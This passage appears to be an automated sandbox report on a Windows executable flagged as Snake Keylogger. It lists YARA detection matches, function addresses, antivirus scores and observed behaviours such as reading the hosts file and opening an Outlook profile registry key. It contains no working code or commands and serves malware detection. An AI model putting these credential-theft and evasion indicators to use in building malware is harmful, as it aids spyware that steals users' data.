                Source: 00000000.00000002.738141181.0000000002A95000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737889019.0000000002A39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737855627.00000000029FC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737285680.00000000028EB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000000.429980691.0000000000532000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.738079094.0000000002A7D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.738039601.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.738059775.0000000002A79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.738194827.0000000002AA5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737190839.00000000028A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737592635.0000000002970000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.738181191.0000000002AA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737144637.000000000288C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737978655.0000000002A5D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737655258.0000000002988000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.735961437.0000000000532000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737628909.0000000002980000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737833563.00000000029F4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737414593.0000000002924000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737929824.0000000002A45000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737560330.0000000002960000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737825477.00000000029F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.738023885.0000000002A6D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.738485397.0000000002AE5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737575208.0000000002968000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737808101.00000000029E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737431755.0000000002930000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737466902.0000000002940000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737280426.00000000028E7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737670833.000000000298C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737689328.0000000002994000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737225304.00000000028C3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737609149.0000000002978000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737936851.0000000002A49000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737641884.0000000002984000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.738147230.0000000002A99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.738223259.0000000002AAD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.738314614.0000000002AC5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737450837.0000000002938000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737597795.0000000002974000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.738125525.0000000002A8D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.738160524.0000000002A9D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.738425558.0000000002AD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.738406461.0000000002AD5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.738262050.0000000002AB5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737864301.0000000002A00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737968200.0000000002A55000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737105124.0000000002867000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737263659.00000000028DB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737253851.00000000028D3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.738109588.0000000002A89000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737973247.0000000002A59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737457876.000000000293C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737523761.0000000002950000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737154483.0000000002890000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737212904.00000000028BB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737268236.00000000028DF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737839802.00000000029F8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.738270244.0000000002AB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.738131471.0000000002A91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737420491.0000000002928000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.738395968.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.738017194.0000000002A69000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737513462.000000000294C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737567001.0000000002964000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000003.670353008.0000000002E38000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.739661705.000000000671A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: Process Memory Space: 0OZQi3b0tM.exe PID: 7100, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 0_2_00C67196
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 0_2_00C66111
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 0_2_00C6F280
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 0_2_00C683C9
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 0_2_00C6A45D
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 0_2_00C65587
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 0_2_00C6F6D8
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 0_2_00C676A8
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 0_2_00C6E758
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 0_2_00C66B88
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 0_2_00C67B08
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 0_2_00C6FB31
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 0_2_00C6EE29
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 0_2_00C67F68
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 0_2_00C671E0
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 0_2_00C64A98
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 0_2_00C64AA8
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 0_2_00C66B78
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 0_2_00C62C29
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 0_2_00C6DFD0
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 0_2_00C6DFE0
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 0_2_04EC0498
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 0_2_04ECB44C
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 0_2_04EC16F8
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 0_2_04EC3678
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 0_2_04ECB798
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 0_2_04EC0040
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 0_2_04EC3028
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 0_2_04EC2398
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 0_2_04EC4318
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 0_2_04EC3CC8
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 0_2_04EC1D48
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 0_2_04EC4FB0
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 0_2_04EC08F0
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 0_2_04EC5850
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 0_2_04EC29E0
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 0_2_04EC4968
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 0_2_04EC0488
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 0_2_04ECC410
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 0_2_04EC16E7
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 0_2_04EC3668
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 0_2_04EC001E
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 0_2_04EC3018
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 0_2_04EC2389
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 0_2_04EC4308
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 0_2_04EC3CB8
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 0_2_04EC1D39
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 0_2_04EC4F9F
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 0_2_04EC8F00
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 0_2_04EC8F10
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 0_2_04EC08E0
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 0_2_04EC29CF
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 0_2_04EC4958
                Source: 0OZQi3b0tM.exe, 00000000.00000002.736120314.00000000008F7000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs 0OZQi3b0tM.exe
                Source: 0OZQi3b0tM.exe, 00000000.00000002.736050763.0000000000552000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameYFGGCVyufgtwfyuTGFWTVFAUYVF.exeX vs 0OZQi3b0tM.exe
                Source: 0OZQi3b0tM.exeBinary or memory string: OriginalFilenameYFGGCVyufgtwfyuTGFWTVFAUYVF.exeX vs 0OZQi3b0tM.exe
                Source: 0OZQi3b0tM.exeVirustotal: Detection: 73%
                Source: 0OZQi3b0tM.exeMetadefender: Detection: 48%
                Source: 0OZQi3b0tM.exeReversingLabs: Detection: 88%
                Source: 0OZQi3b0tM.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@4/2
                Source: 0OZQi3b0tM.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.79%
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: 0OZQi3b0tM.exeString found in binary or memory: F-Stopw
                Source: 0OZQi3b0tM.exeString found in binary or memory: F-Stopw
                Source: 0OZQi3b0tM.exe, ??u0609?ufffd/Bufffdu02f3?u061d.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                Source: 0OZQi3b0tM.exe, u003b?u058f??/?u0040???.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.0OZQi3b0tM.exe.530000.0.unpack, ??u0609?ufffd/Bufffdu02f3?u061d.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                Source: 0.2.0OZQi3b0tM.exe.530000.0.unpack, u003b?u058f??/?u0040???.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.0.0OZQi3b0tM.exe.530000.0.unpack, ??u0609?ufffd/Bufffdu02f3?u061d.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                Source: 0.0.0OZQi3b0tM.exe.530000.0.unpack, u003b?u058f??/?u0040???.csCryptographic APIs: 'TransformFinalBlock'
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: 0OZQi3b0tM.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: 0OZQi3b0tM.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeProcess information set: NOOPENFILEERRORBOX
